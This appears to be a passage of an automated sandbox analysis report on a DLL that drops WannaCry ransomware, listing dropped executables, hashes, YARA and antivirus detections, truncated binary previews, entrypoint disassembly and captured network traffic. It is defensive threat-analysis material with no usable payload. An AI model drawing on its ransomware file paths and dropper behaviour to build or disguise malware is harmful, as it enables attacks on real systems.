                                                                                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".n.o.O.p.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".n.o.O.p.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.}.,.\.".a.c.t.i.o.n.\.".:.\.".n.o.O.p.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.".:.\.".i.m.p.r.e.s.s.i.o.n.\.".}.].,.\.".p.a.r.a.m.e.t.e.r.i.z.e.d.\.".:.[.{.\.".u.r.i.\.".:.\.".h.t.t.p.s.:.\./.\./.r.i.s...a.p.i...i.r.i.s...m.i.c.r.o.s.o.f.t...c.o.m.\./.v.1.\./.a.\./.{.A.C.T.I.O.N.}.?.C.I.D.=.1.2.8.0.0.0.0.0.0.0.0.1.6.2.7.4.0.9.&.r.e.g.i.o.n.=.U.S.&.l.

                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\1658565894 (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6090
                                                                                                                                              Entropy (8bit):3.8377386003114715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyEUIXUwTk4brjXUzrkUQUwOI1kBUM8k0s7MRhwFDBc:Lv44wFyEjkwA4XDIrkqwlM8k0pRW5G
                                                                                                                                              MD5:BFDECB77885429E9C67C10DE3557D13D
                                                                                                                                              SHA1:5CD3D93F47D7A50C7910DD7D032756320E069129
                                                                                                                                              SHA-256:849C9385B3860B9C6DF193EFCBFFD3793986677A4FB00B69ABE000E0F58F116A
                                                                                                                                              SHA-512:8921CC70210D552B211FC48F97EFA8A98967610384C5C5F1BB75B28BC0277D993296D8CC3E288290EC3C2FE5F6066FA3D2CAFB27571A1F36E29E94C024CD17A3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".n.o.O.p.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".n.o.O.p.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.}.,.\.".a.c.t.i.o.n.\.".:.\.".n.o.O.p.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.".:.\.".i.m.p.r.e.s.s.i.o.n.\.".}.].,.\.".p.a.r.a.m.e.t.e.r.i.z.e.d.\.".:.[.{.\.".u.r.i.\.".:.\.".h.t.t.p.s.:.\./.\./.r.i.s...a.p.i...i.r.i.s...m.i.c.r.o.s.o.f.t...c.o.m.\./.v.1.\./.a.\./.{.A.C.T.I.O.N.}.?.C.I.D.=.1.2.8.0.0.0.0.0.0.0.0.1.6.2.7.4.0.9.&.r.e.g.i.o.n.=.U.S.&.l.

                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\1658565894.~tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6090
                                                                                                                                              Entropy (8bit):3.8377386003114715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyEUIXUwTk4brjXUzrkUQUwOI1kBUM8k0s7MRhwFDBc:Lv44wFyEjkwA4XDIrkqwlM8k0pRW5G
                                                                                                                                              MD5:BFDECB77885429E9C67C10DE3557D13D
                                                                                                                                              SHA1:5CD3D93F47D7A50C7910DD7D032756320E069129
                                                                                                                                              SHA-256:849C9385B3860B9C6DF193EFCBFFD3793986677A4FB00B69ABE000E0F58F116A
                                                                                                                                              SHA-512:8921CC70210D552B211FC48F97EFA8A98967610384C5C5F1BB75B28BC0277D993296D8CC3E288290EC3C2FE5F6066FA3D2CAFB27571A1F36E29E94C024CD17A3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".n.o.O.p.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".n.o.O.p.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.}.,.\.".a.c.t.i.o.n.\.".:.\.".n.o.O.p.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.".:.\.".i.m.p.r.e.s.s.i.o.n.\.".}.].,.\.".p.a.r.a.m.e.t.e.r.i.z.e.d.\.".:.[.{.\.".u.r.i.\.".:.\.".h.t.t.p.s.:.\./.\./.r.i.s...a.p.i...i.r.i.s...m.i.c.r.o.s.o.f.t...c.o.m.\./.v.1.\./.a.\./.{.A.C.T.I.O.N.}.?.C.I.D.=.1.2.8.0.0.0.0.0.0.0.0.1.6.2.7.4.0.9.&.r.e.g.i.o.n.=.U.S.&.l.

                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):55
                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                              C:\Windows\mssecsvc.exe

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3751936
                                                                                                                                              Entropy (8bit):6.540577440579626
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:TnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:zDqPoBhz1aRxcSUDk36SA
                                                                                                                                              MD5:B0F06045E4D3E693094C54C315A5B632
                                                                                                                                              SHA1:79AC0293A7343DE40831B2F141E7E73FA20E6D72
                                                                                                                                              SHA-256:1672B56A8E29207AC942E894A080832C2E162044B62E439CBEA37347B4AEA004
                                                                                                                                              SHA-512:F186DBB625437CB0E6DBEB07B7122A7C43296A2C8CA076A49219A04EDD8D4237D35F14A4DA094348825B540B9FF08120730D899A345AD509C67E70D0A1502FCA
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                              • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                                                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              • Antivirus: Metadefender, Detection: 82%, Browse
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L...q..L.....................08...................@..........................0g......................................................1.. 6..........................................................................................................text.............................. ....rdata..............................@..@.data....H0......p..................@....rsrc.... 6...1.. 6.. ..............`...jirjvcn...... g......@9.................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Windows\tasksche.exe

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\mssecsvc.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3514368
                                                                                                                                              Entropy (8bit):6.5250408221172975
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:nQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAL:QqPoBhz1aRxcSUDk36SA8
                                                                                                                                              MD5:3233ACED9279EF54267C479BBA665B90
                                                                                                                                              SHA1:0B2CC142386641901511269503CDF6F641FAD305
                                                                                                                                              SHA-256:F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
                                                                                                                                              SHA-512:55F25C51FFB89D46F2A7D2ED9B67701E178BD68E74B71D757D5FA14BD9530A427104FC36116633033EAD762ECF7960AB96429F5B0A085A701001C6832BA4555E
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                                                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              • Antivirus: Metadefender, Detection: 85%, Browse
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: 7B6t4L7E2o.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: 4GDffePnzH.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: HFKDS6VcNO.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: FjYNZSPNkt.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: kBBdc7Aoj4.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: tct5NKwZY8.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: 7KPQg3aXdC.dll, Detection: malicious, Browse
                                                                                                                                              • Filename: ngFFOGiE7Y.dll, Detection: malicious, Browse
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Entropy (8bit):5.052974659231348
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:y2jb4FtSNq.dll
                                                                                                                                              File size:5267459
                                                                                                                                              MD5:61d81fc3058ef67dd352bc2fd80bce2d
                                                                                                                                              SHA1:bc7c0991e7e4646f8b2c9297a83a4259801e85bf
                                                                                                                                              SHA256:66b760a1f256e538002892e020f0993d6e701dc15bb7333109b3a59b5b157082
                                                                                                                                              SHA512:cd0565d8baf0d178341035d25aace9f25e92b5809fb74deced1a7a5ea2669912be4a80f61743c7e8d70668988bedd4e1a60adfd55023d7fb29a22a8967a2faf7
                                                                                                                                              SSDEEP:49152:qnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:GDqPoBhz1aRxcSUDk36SA
                                                                                                                                              TLSH:D836F601D2E51AA0DAF25EF7267ADB10833A6F45895BA66E1221500F0C77F1CDDE6F2C
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                                                              Static PE Info

                                                                                                                                              General

                                                                                                                                              Entrypoint:0x100011e9
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x10000000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                                                                                              DLL Characteristics:
                                                                                                                                              Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:4
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:4
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:4
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:2e5708ae5fed0403e8117c645fb23e5b

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              push ebp
                                                                                                                                              mov ebp, esp
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, dword ptr [ebp+08h]
                                                                                                                                              push esi
                                                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                                                              push edi
                                                                                                                                              mov edi, dword ptr [ebp+10h]
                                                                                                                                              test esi, esi
                                                                                                                                              jne 00007FD4B8C1F61Bh
                                                                                                                                              cmp dword ptr [10003140h], 00000000h
                                                                                                                                              jmp 00007FD4B8C1F638h
                                                                                                                                              cmp esi, 01h
                                                                                                                                              je 00007FD4B8C1F617h
                                                                                                                                              cmp esi, 02h
                                                                                                                                              jne 00007FD4B8C1F634h
                                                                                                                                              mov eax, dword ptr [10003150h]
                                                                                                                                              test eax, eax
                                                                                                                                              je 00007FD4B8C1F61Bh
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call eax
                                                                                                                                              test eax, eax
                                                                                                                                              je 00007FD4B8C1F61Eh
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call 00007FD4B8C1F52Ah
                                                                                                                                              test eax, eax
                                                                                                                                              jne 00007FD4B8C1F616h
                                                                                                                                              xor eax, eax
                                                                                                                                              jmp 00007FD4B8C1F660h
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call 00007FD4B8C1F3DCh
                                                                                                                                              cmp esi, 01h
                                                                                                                                              mov dword ptr [ebp+0Ch], eax
                                                                                                                                              jne 00007FD4B8C1F61Eh
                                                                                                                                              test eax, eax
                                                                                                                                              jne 00007FD4B8C1F649h
                                                                                                                                              push edi
                                                                                                                                              push eax
                                                                                                                                              push ebx
                                                                                                                                              call 00007FD4B8C1F506h
                                                                                                                                              test esi, esi
                                                                                                                                              je 00007FD4B8C1F617h
                                                                                                                                              cmp esi, 03h
                                                                                                                                              jne 00007FD4B8C1F638h
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call 00007FD4B8C1F4F5h
                                                                                                                                              test eax, eax
                                                                                                                                              jne 00007FD4B8C1F615h
                                                                                                                                              and dword ptr [ebp+0Ch], eax
                                                                                                                                              cmp dword ptr [ebp+0Ch], 00000000h
                                                                                                                                              je 00007FD4B8C1F623h
                                                                                                                                              mov eax, dword ptr [10003150h]
                                                                                                                                              test eax, eax
                                                                                                                                              je 00007FD4B8C1F61Ah
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call eax
                                                                                                                                              mov dword ptr [ebp+0Ch], eax
                                                                                                                                              mov eax, dword ptr [ebp+0Ch]
                                                                                                                                              pop edi
                                                                                                                                              pop esi
                                                                                                                                              pop ebx
                                                                                                                                              pop ebp
                                                                                                                                              retn 000Ch
                                                                                                                                              jmp dword ptr [10002028h]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al

                                                                                                                                              Rich Headers

                                                                                                                                              Programming Language:
                                                                                                                                              • [ C ] VS98 (6.0) build 8168
                                                                                                                                              • [C++] VS98 (6.0) build 8168
                                                                                                                                              • [RES] VS98 (6.0) cvtres build 1720
                                                                                                                                              • [LNK] VS98 (6.0) imp/exp build 8168

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x21900x48.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x203c0x3c.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x500060.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5050000x5c.reloc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x3c.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x10000x28c0x1000False0.13037109375data1.4429971244731552IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rdata0x20000x1d80x1000False0.072509765625data0.7346018133622799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .data0x30000x1540x1000False0.016845703125data0.085238686413312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .rsrc0x40000x5000600x501000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .reloc0x5050000x2ac0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                              Resources

                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                              W0x40600x500000dataEnglishUnited States

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              KERNEL32.dllCloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
                                                                                                                                              MSVCRT.dllfree, _initterm, malloc, _adjust_fdiv, sprintf

                                                                                                                                              Exports

                                                                                                                                              NameOrdinalAddress
                                                                                                                                              PlayGame10x10001114

                                                                                                                                              Possible Origin

                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                              EnglishUnited States

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Jul 23, 2022 01:44:23.779597998 CEST4974080192.168.2.3104.16.173.80
                                                                                                                                              Jul 23, 2022 01:44:23.797516108 CEST8049740104.16.173.80192.168.2.3
                                                                                                                                              Jul 23, 2022 01:44:23.797653913 CEST4974080192.168.2.3104.16.173.80
                                                                                                                                              Jul 23, 2022 01:44:23.822949886 CEST4974080192.168.2.3104.16.173.80
                                                                                                                                              Jul 23, 2022 01:44:23.839699984 CEST8049740104.16.173.80192.168.2.3
                                                                                                                                              Jul 23, 2022 01:44:23.851027012 CEST8049740104.16.173.80192.168.2.3
                                                                                                                                              Jul 23, 2022 01:44:23.851067066 CEST8049740104.16.173.80192.168.2.3
                                                                                                                                              Jul 23, 2022 01:44:23.851126909 CEST4974080192.168.2.3104.16.173.80
                                                                                                                                              Jul 23, 2022 01:44:23.851174116 CEST4974080192.168.2.3104.16.173.80
                                                                                                                                              Jul 23, 2022 01:44:23.851273060 CEST4974080192.168.2.3104.16.173.80
                                                                                                                                              Jul 23, 2022 01:44:23.869515896 CEST8049740104.16.173.80192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:05.535712957 CEST4977280192.168.2.3104.17.244.81
                                                                                                                                              Jul 23, 2022 01:46:05.554590940 CEST8049772104.17.244.81192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:05.554871082 CEST4977280192.168.2.3104.17.244.81
                                                                                                                                              Jul 23, 2022 01:46:05.567797899 CEST4977280192.168.2.3104.17.244.81
                                                                                                                                              Jul 23, 2022 01:46:05.585793018 CEST8049772104.17.244.81192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:05.601896048 CEST8049772104.17.244.81192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:05.601993084 CEST4977280192.168.2.3104.17.244.81
                                                                                                                                              Jul 23, 2022 01:46:05.602139950 CEST4977280192.168.2.3104.17.244.81
                                                                                                                                              Jul 23, 2022 01:46:05.602385044 CEST8049772104.17.244.81192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:05.604804993 CEST4977280192.168.2.3104.17.244.81
                                                                                                                                              Jul 23, 2022 01:46:05.619992018 CEST8049772104.17.244.81192.168.2.3

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Jul 23, 2022 01:44:23.724916935 CEST6485153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:44:23.746457100 CEST53648518.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:05.482811928 CEST5139153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:46:05.504637003 CEST53513918.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.549423933 CEST53631468.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.604020119 CEST53529858.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.635500908 CEST53586258.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.684672117 CEST53528108.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.712487936 CEST53507788.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.753336906 CEST53551518.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.809433937 CEST53597958.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.859280109 CEST53593908.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.890558004 CEST53648168.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.927709103 CEST53649968.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:39.967245102 CEST53538168.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.000349045 CEST53520968.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.043453932 CEST53606408.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.078761101 CEST53498448.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.106173992 CEST53638618.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.143222094 CEST53515188.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.173316956 CEST53497238.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.201761961 CEST53525818.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.252249002 CEST53501528.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.285356998 CEST53566398.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.323287010 CEST53504508.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.364543915 CEST53524278.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.393420935 CEST53627248.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.427232981 CEST53649418.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.471981049 CEST53554038.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.500582933 CEST53549608.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.546382904 CEST53618778.8.8.8192.168.2.3
